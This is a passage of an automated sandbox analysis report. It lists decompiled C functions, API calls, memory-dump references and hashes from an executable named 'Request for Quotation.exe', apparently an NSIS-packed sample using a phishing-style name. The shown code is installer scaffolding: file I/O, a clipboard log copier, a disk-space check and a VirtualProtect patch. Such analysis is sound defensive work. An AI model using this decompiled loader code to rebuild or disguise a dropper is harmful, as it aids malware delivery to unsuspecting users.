                                                                                				if(_t5 == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				goto L2;
                                                                                			}






                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                  • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                  • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                  • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2547128583-0
                                                                                • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                                • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00405DE6(CHAR* _a4, long _a8, long _a12) {
                                                                                				signed int _t5;
                                                                                				void* _t6;
                                                                                
                                                                                				_t5 = GetFileAttributesA(_a4); // executed
                                                                                				asm("sbb ecx, ecx");
                                                                                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                				return _t6;
                                                                                			}






                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405DEA
                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                                • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405DC1(CHAR* _a4) {
                                                                                				signed char _t3;
                                                                                				signed char _t7;
                                                                                
                                                                                				_t3 = GetFileAttributesA(_a4); // executed
                                                                                				_t7 = _t3;
                                                                                				if(_t7 != 0xffffffff) {
                                                                                					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                				}
                                                                                				return _t7;
                                                                                			}






                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                                                • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004058B7(CHAR* _a4) {
                                                                                				int _t2;
                                                                                
                                                                                				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                				if(_t2 == 0) {
                                                                                					return GetLastError();
                                                                                				}
                                                                                				return 0;
                                                                                			}





                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405E5E(void* _a4, void* _a8, long _a12) {
                                                                                				int _t7;
                                                                                				long _t11;
                                                                                
                                                                                				_t11 = _a12;
                                                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                				if(_t7 == 0 || _t11 != _a12) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					return 1;
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405E8D(void* _a4, void* _a8, long _a12) {
                                                                                				int _t7;
                                                                                				long _t11;
                                                                                
                                                                                				_t11 = _a12;
                                                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                				if(_t7 == 0 || _t11 != _a12) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					return 1;
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004188C7,00415460,004033BF,00415460,004188C7,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                
                                                                                				 *0x6f714038 = _a4;
                                                                                				if(_a8 == 1) {
                                                                                					VirtualProtect(0x6f71404c, 4, 0x40, 0x6f71403c); // executed
                                                                                					 *0x6f71404c = 0xc2;
                                                                                					 *0x6f71403c = 0;
                                                                                					 *0x6f714044 = 0;
                                                                                					 *0x6f714058 = 0;
                                                                                					 *0x6f714048 = 0;
                                                                                					 *0x6f714040 = 0;
                                                                                					 *0x6f714050 = 0;
                                                                                					 *0x6f71404e = 0;
                                                                                				}
                                                                                				return 1;
                                                                                			}




                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(6F71404C,00000004,00000040,6F71403C), ref: 6F71293F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040343E(long _a4) {
                                                                                				long _t2;
                                                                                
                                                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                				return _t2;
                                                                                			}





                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E6F711215() {
                                                                                				void* _t1;
                                                                                
                                                                                				_t1 = GlobalAlloc(0x40,  *0x6f71405c); // executed
                                                                                				return _t1;
                                                                                			}





                                                                                APIs
                                                                                • GlobalAlloc.KERNELBASE(00000040,6F711233,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F71121D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocGlobal
                                                                                • String ID:
                                                                                • API String ID: 3761449716-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                C-Code - Quality: 96%
                                                                                			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                				struct HWND__* _v8;
                                                                                				struct tagRECT _v24;
                                                                                				void* _v32;
                                                                                				signed int _v36;
                                                                                				int _v40;
                                                                                				int _v44;
                                                                                				signed int _v48;
                                                                                				int _v52;
                                                                                				void* _v56;
                                                                                				void* _v64;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				struct HWND__* _t87;
                                                                                				struct HWND__* _t89;
                                                                                				long _t90;
                                                                                				int _t95;
                                                                                				int _t96;
                                                                                				long _t99;
                                                                                				void* _t102;
                                                                                				intOrPtr _t124;
                                                                                				struct HWND__* _t128;
                                                                                				int _t150;
                                                                                				int _t153;
                                                                                				long _t157;
                                                                                				struct HWND__* _t161;
                                                                                				struct HMENU__* _t163;
                                                                                				long _t165;
                                                                                				void* _t166;
                                                                                				char* _t167;
                                                                                				char* _t168;
                                                                                				int _t169;
                                                                                
                                                                                				_t87 =  *0x42ec24; // 0x0
                                                                                				_t157 = _a8;
                                                                                				_t150 = 0;
                                                                                				_v8 = _t87;
                                                                                				if(_t157 != 0x110) {
                                                                                					__eflags = _t157 - 0x405;
                                                                                					if(_t157 == 0x405) {
                                                                                						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                					}
                                                                                					__eflags = _t157 - 0x111;
                                                                                					if(_t157 != 0x111) {
                                                                                						L17:
                                                                                						__eflags = _t157 - 0x404;
                                                                                						if(_t157 != 0x404) {
                                                                                							L25:
                                                                                							__eflags = _t157 - 0x7b;
                                                                                							if(_t157 != 0x7b) {
                                                                                								goto L20;
                                                                                							}
                                                                                							_t89 = _v8;
                                                                                							__eflags = _a12 - _t89;
                                                                                							if(_a12 != _t89) {
                                                                                								goto L20;
                                                                                							}
                                                                                							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                							__eflags = _t90 - _t150;
                                                                                							_a12 = _t90;
                                                                                							if(_t90 <= _t150) {
                                                                                								L36:
                                                                                								return 0;
                                                                                							}
                                                                                							_t163 = CreatePopupMenu();
                                                                                							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                							_t95 = _a16;
                                                                                							__eflags = _a16 - 0xffffffff;
                                                                                							_t153 = _a16 >> 0x10;
                                                                                							if(_a16 == 0xffffffff) {
                                                                                								GetWindowRect(_v8,  &_v24);
                                                                                								_t95 = _v24.left;
                                                                                								_t153 = _v24.top;
                                                                                							}
                                                                                							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                							__eflags = _t96 - 1;
                                                                                							if(_t96 == 1) {
                                                                                								_t165 = 1;
                                                                                								__eflags = 1;
                                                                                								_v56 = _t150;
                                                                                								_v44 = 0x42a8b8;
                                                                                								_v40 = 0x1000;
                                                                                								_a4 = _a12;
                                                                                								do {
                                                                                									_a4 = _a4 - 1;
                                                                                									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                									__eflags = _a4 - _t150;
                                                                                									_t165 = _t165 + _t99 + 2;
                                                                                								} while (_a4 != _t150);
                                                                                								OpenClipboard(_t150);
                                                                                								EmptyClipboard();
                                                                                								_t102 = GlobalAlloc(0x42, _t165);
                                                                                								_a4 = _t102;
                                                                                								_t166 = GlobalLock(_t102);
                                                                                								do {
                                                                                									_v44 = _t166;
                                                                                									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                									 *_t167 = 0xd;
                                                                                									_t168 = _t167 + 1;
                                                                                									 *_t168 = 0xa;
                                                                                									_t166 = _t168 + 1;
                                                                                									_t150 = _t150 + 1;
                                                                                									__eflags = _t150 - _a12;
                                                                                								} while (_t150 < _a12);
                                                                                								GlobalUnlock(_a4);
                                                                                								SetClipboardData(1, _a4);
                                                                                								CloseClipboard();
                                                                                							}
                                                                                							goto L36;
                                                                                						}
                                                                                						__eflags =  *0x42ec0c - _t150; // 0x0
                                                                                						if(__eflags == 0) {
                                                                                							ShowWindow( *0x42f448, 8);
                                                                                							__eflags =  *0x42f4ec - _t150;
                                                                                							if( *0x42f4ec == _t150) {
                                                                                								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
                                                                                							}
                                                                                							E004042AA(1);
                                                                                							goto L25;
                                                                                						}
                                                                                						 *0x429c88 = 2;
                                                                                						E004042AA(0x78);
                                                                                						goto L20;
                                                                                					} else {
                                                                                						__eflags = _a12 - 0x403;
                                                                                						if(_a12 != 0x403) {
                                                                                							L20:
                                                                                							return E00404338(_t157, _a12, _a16);
                                                                                						}
                                                                                						ShowWindow( *0x42ec10, _t150);
                                                                                						ShowWindow(_v8, 8);
                                                                                						E00404306(_v8);
                                                                                						goto L17;
                                                                                					}
                                                                                				}
                                                                                				_v48 = _v48 | 0xffffffff;
                                                                                				_v36 = _v36 | 0xffffffff;
                                                                                				_t169 = 2;
                                                                                				_v56 = _t169;
                                                                                				_v52 = 0;
                                                                                				_v44 = 0;
                                                                                				_v40 = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				_t124 =  *0x42f454;
                                                                                				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                				 *0x42ec10 = GetDlgItem(_a4, 0x403);
                                                                                				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
                                                                                				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                				 *0x42ec24 = _t128;
                                                                                				_v8 = _t128;
                                                                                				E00404306( *0x42ec10);
                                                                                				 *0x42ec14 = E00404BF7(4);
                                                                                				 *0x42ec2c = 0;
                                                                                				GetClientRect(_v8,  &_v24);
                                                                                				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                				if(_a12 >= 0) {
                                                                                					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                				}
                                                                                				if(_a8 >= _t150) {
                                                                                					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                				}
                                                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                				_push(0x1b);
                                                                                				E004042D1(_a4);
                                                                                				if(( *0x42f45c & 0x00000003) != 0) {
                                                                                					ShowWindow( *0x42ec10, _t150);
                                                                                					if(( *0x42f45c & 0x00000002) != 0) {
                                                                                						 *0x42ec10 = _t150;
                                                                                					} else {
                                                                                						ShowWindow(_v8, 8);
                                                                                					}
                                                                                					E00404306( *0x42ec08);
                                                                                				}
                                                                                				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                				if(( *0x42f45c & 0x00000004) != 0) {
                                                                                					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                				}
                                                                                				goto L36;
                                                                                 			}

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 00405511
                                                                                • GetDlgItem.USER32 ref: 00405520
                                                                                • GetClientRect.USER32 ref: 0040555D
                                                                                • GetSystemMetrics.USER32 ref: 00405564
                                                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405600
                                                                                • GetDlgItem.USER32 ref: 00405621
                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
                                                                                • GetDlgItem.USER32 ref: 0040552F
                                                                                  • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                • GetDlgItem.USER32 ref: 00405672
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005446,00000000), ref: 00405680
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                                                • ShowWindow.USER32(00000000), ref: 004056AA
                                                                                • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                                                • ShowWindow.USER32(00000008), ref: 004056F7
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
                                                                                • CreatePopupMenu.USER32 ref: 0040573C
                                                                                • AppendMenuA.USER32 ref: 00405751
                                                                                • GetWindowRect.USER32 ref: 00405771
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
                                                                                • OpenClipboard.USER32(00000000), ref: 004057D6
                                                                                • EmptyClipboard.USER32 ref: 004057DC
                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                                                • GlobalLock.KERNEL32 ref: 004057EF
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405827
                                                                                • CloseClipboard.USER32 ref: 0040582D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID:
                                                                                • API String ID: 590372296-0
                                                                                • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                                • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				long _v16;
                                                                                				long _v20;
                                                                                				long _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _v32;
                                                                                				long _v36;
                                                                                				char _v40;
                                                                                				unsigned int _v44;
                                                                                				signed int _v48;
                                                                                				CHAR* _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				CHAR* _v72;
                                                                                				void _v76;
                                                                                				struct HWND__* _v80;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t82;
                                                                                				long _t87;
                                                                                				signed char* _t89;
                                                                                				void* _t95;
                                                                                				signed int _t96;
                                                                                				int _t109;
                                                                                				signed char _t114;
                                                                                				signed int _t118;
                                                                                				struct HWND__** _t122;
                                                                                				intOrPtr* _t138;
                                                                                				CHAR* _t146;
                                                                                				intOrPtr _t147;
                                                                                				unsigned int _t150;
                                                                                				signed int _t152;
                                                                                				unsigned int _t156;
                                                                                				signed int _t158;
                                                                                				signed int* _t159;
                                                                                				signed char* _t160;
                                                                                				struct HWND__* _t165;
                                                                                				struct HWND__* _t166;
                                                                                				int _t168;
                                                                                				unsigned int _t197;
                                                                                
                                                                                				_t156 = __edx;
                                                                                				_t82 =  *0x42a090;
                                                                                				_v32 = _t82;
                                                                                				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                				if(_a8 == 0x40b) {
                                                                                					E0040594D(0x3fb, _t146);
                                                                                					E00406528(_t146);
                                                                                				}
                                                                                				_t166 = _a4;
                                                                                				if(_a8 != 0x110) {
                                                                                					L8:
                                                                                					if(_a8 != 0x111) {
                                                                                						L20:
                                                                                						if(_a8 == 0x40f) {
                                                                                							L22:
                                                                                							_v8 = _v8 & 0x00000000;
                                                                                							_v12 = _v12 & 0x00000000;
                                                                                							E0040594D(0x3fb, _t146);
                                                                                							if(E00405CD3(_t185, _t146) == 0) {
                                                                                								_v8 = 1;
                                                                                							}
                                                                                							E0040624D(0x429888, _t146);
                                                                                							_t87 = E00406656(1);
                                                                                							_v16 = _t87;
                                                                                							if(_t87 == 0) {
                                                                                								L30:
                                                                                								E0040624D(0x429888, _t146);
                                                                                								_t89 = E00405C7E(0x429888);
                                                                                								_t158 = 0;
                                                                                								if(_t89 != 0) {
                                                                                									 *_t89 =  *_t89 & 0x00000000;
                                                                                								}
                                                                                								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                									goto L35;
                                                                                								} else {
                                                                                									_t168 = 0x400;
                                                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                									asm("cdq");
                                                                                									_v48 = _t109;
                                                                                									_v44 = _t156;
                                                                                									_v12 = 1;
                                                                                									goto L36;
                                                                                								}
                                                                                							} else {
                                                                                								_t159 = 0;
                                                                                								if(0 == 0x429888) {
                                                                                									goto L30;
                                                                                								} else {
                                                                                									goto L26;
                                                                                								}
                                                                                								while(1) {
                                                                                									L26:
                                                                                									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
                                                                                									if(_t114 != 0) {
                                                                                										break;
                                                                                									}
                                                                                									if(_t159 != 0) {
                                                                                										 *_t159 =  *_t159 & _t114;
                                                                                									}
                                                                                									_t160 = E00405C2C(0x429888);
                                                                                									 *_t160 =  *_t160 & 0x00000000;
                                                                                									_t159 = _t160 - 1;
                                                                                									 *_t159 = 0x5c;
                                                                                									if(_t159 != 0x429888) {
                                                                                										continue;
                                                                                									} else {
                                                                                										goto L30;
                                                                                									}
                                                                                								}
                                                                                								_t150 = _v44;
                                                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                								_v44 = _t150 >> 0xa;
                                                                                								_v12 = 1;
                                                                                								_t158 = 0;
                                                                                								__eflags = 0;
                                                                                								L35:
                                                                                								_t168 = 0x400;
                                                                                								L36:
                                                                                								_t95 = E00404BF7(5);
                                                                                								if(_v12 != _t158) {
                                                                                									_t197 = _v44;
                                                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                										_v8 = 2;
                                                                                									}
                                                                                								}
                                                                                								_t147 =  *0x42ec1c; // 0x6aacde
                                                                                								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                									E00404BDF(0x3ff, 0xfffffffb, _t95);
                                                                                									if(_v12 == _t158) {
                                                                                										SetDlgItemTextA(_a4, _t168, 0x429878);
                                                                                									} else {
                                                                                										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
                                                                                									}
                                                                                								}
                                                                                								_t96 = _v8;
                                                                                								 *0x42f504 = _t96;
                                                                                								if(_t96 == _t158) {
                                                                                									_v8 = E0040140B(7);
                                                                                								}
                                                                                								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                									_v8 = _t158;
                                                                                								}
                                                                                								E004042F3(0 | _v8 == _t158);
                                                                                								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
                                                                                									E004046BC();
                                                                                								}
                                                                                								 *0x42a8a8 = _t158;
                                                                                								goto L53;
                                                                                							}
                                                                                						}
                                                                                						_t185 = _a8 - 0x405;
                                                                                						if(_a8 != 0x405) {
                                                                                							goto L53;
                                                                                						}
                                                                                						goto L22;
                                                                                					}
                                                                                					_t118 = _a12 & 0x0000ffff;
                                                                                					if(_t118 != 0x3fb) {
                                                                                						L12:
                                                                                						if(_t118 == 0x3e9) {
                                                                                							_t152 = 7;
